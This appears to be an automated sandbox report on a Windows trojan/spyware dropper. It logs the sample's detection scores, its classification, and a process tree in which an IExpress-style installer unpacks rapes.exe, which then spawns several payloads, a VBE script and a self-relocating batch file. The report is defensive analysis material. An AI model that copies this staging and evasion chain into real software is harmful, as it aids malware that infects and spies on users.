Source: mAtJWNv[1].exe.15.dr	Static PE information: Section: .css ZLIB complexity 0.9975900423728814
Source: mAtJWNv.exe.15.dr	Static PE information: Section: .css ZLIB complexity 0.9975900423728814

Source: 3B05c.exe.0.dr

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: 6z1l5Yn[1].exe.15.dr, eqqrt5LE3cVaS2s6Kr.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6z1l5Yn[1].exe.15.dr, Wy6b3.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6z1l5Yn[1].exe.15.dr, b8NKa72.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6z1l5Yn.exe.15.dr, eqqrt5LE3cVaS2s6Kr.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6z1l5Yn.exe.15.dr, Wy6b3.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6z1l5Yn.exe.15.dr, b8NKa72.cs	Cryptographic APIs: 'CreateDecryptor'
Source: mAtJWNv[1].exe.15.dr, Ce716WgjPJi1to0DwO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: mAtJWNv.exe.15.dr, Ce716WgjPJi1to0DwO.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@89/74@67/13

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe

Code function: 1_2_00E23FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,

1_2_00E23FEF

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe

Code function: 1_2_00E21F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,

1_2_00E21F90

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe

Code function: 1_2_00E2597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,

1_2_00E2597D

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe

Code function: 1_2_00E24FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,

1_2_00E24FE0

Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe

File created: C:\Program Files\Common Files\Adobe\xoQfYYRSvCZVkLtfl.exe

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\cuFIzyH[1].exe

Jump to behavior

Source: C:\Windows\twain_32\1u58lIqYIC.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\34c427afce3fdad27990a5bd47be2191abc439c5d1a7304813dd2c2a0346ebb3
Source: C:\Windows\twain_32\1u58lIqYIC.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6628:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3316:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1932:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03

Source: C:\Users\user\Desktop\download.php.exe.bin.exe

File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP

Jump to behavior

Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NpnD5G3qEA.bat"

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe

Command line argument: Kernel32.dll

1_2_00E22BFB

Source: download.php.exe.bin.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\twain_32\1u58lIqYIC.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\download.php.exe.bin.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"

Source: download.php.exe.bin.exe	Virustotal: Detection: 65%
Source: download.php.exe.bin.exe	ReversingLabs: Detection: 60%

Source: 1Z46i3.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 1Z46i3.exe	String found in binary or memory: " /add /y
Source: 1Z46i3.exe	String found in binary or memory: " /add
Source: rapes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe	String found in binary or memory: " /add /y
Source: rapes.exe	String found in binary or memory: " /add
Source: rapes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe	String found in binary or memory: " /add /y
Source: rapes.exe	String found in binary or memory: " /add
Source: 2Q0510.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe	String found in binary or memory: " /add /y
Source: rapes.exe	String found in binary or memory: " /add
Source: cuFIzyH.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\download.php.exe.bin.exe "C:\Users\user\Desktop\download.php.exe.bin.exe"
Source: C:\Users\user\Desktop\download.php.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe "C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe "C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe"
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Process created: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe "C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe"
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Process created: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe "C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe"
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Process created: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe "C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe"
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Process created: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe "C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe"
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Process created: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe "C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe "C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe"
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe "C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe "C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe"
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Process created: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe "C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe"
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Process created: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe "C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe"
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Process created: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe "C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe"
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Process created: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe "C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe"
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Process created: C:\Users\user\AppData\Roaming\9OJj7W96hi.exe "C:\Users\user\AppData\Roaming\9OJj7W96hi.exe"
Source: C:\Users\user\AppData\Roaming\9OJj7W96hi.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Process created: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe "C:\Users\user\AppData\Roaming\1u58lIqYIC.exe"
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NpnD5G3qEA.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe "C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\1u58lIqYIC.exe "C:\Windows\twain_32\1u58lIqYIC.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe "C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe"
Source: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe	Process created: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe "C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe"
Source: C:\Users\user\Desktop\download.php.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe "C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe "C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe "C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe "C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe "C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe "C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe "C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe "C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Process created: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe "C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Process created: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe "C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Process created: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe "C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Process created: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe "C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Process created: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe "C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe"
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Process created: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe "C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe"
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Process created: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe "C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe"
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Process created: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe "C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe"
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Process created: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe "C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe"
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Process created: C:\Users\user\AppData\Roaming\9OJj7W96hi.exe "C:\Users\user\AppData\Roaming\9OJj7W96hi.exe"
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	Process created: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe "C:\Users\user\AppData\Roaming\1u58lIqYIC.exe"
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NpnD5G3qEA.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\1u58lIqYIC.exe "C:\Windows\twain_32\1u58lIqYIC.exe"
Source: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe	Process created: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe "C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe"

Source: C:\Users\user\Desktop\download.php.exe.bin.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.php.exe.bin.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.php.exe.bin.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.php.exe.bin.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.php.exe.bin.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.php.exe.bin.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.php.exe.bin.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.php.exe.bin.exe	Section loaded: feclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.php.exe.bin.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\download.php.exe.bin.exe	Section loaded: advpack.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Section loaded: feclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Section loaded: advpack.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	Section loaded: edputil.dll	Jump to behavior
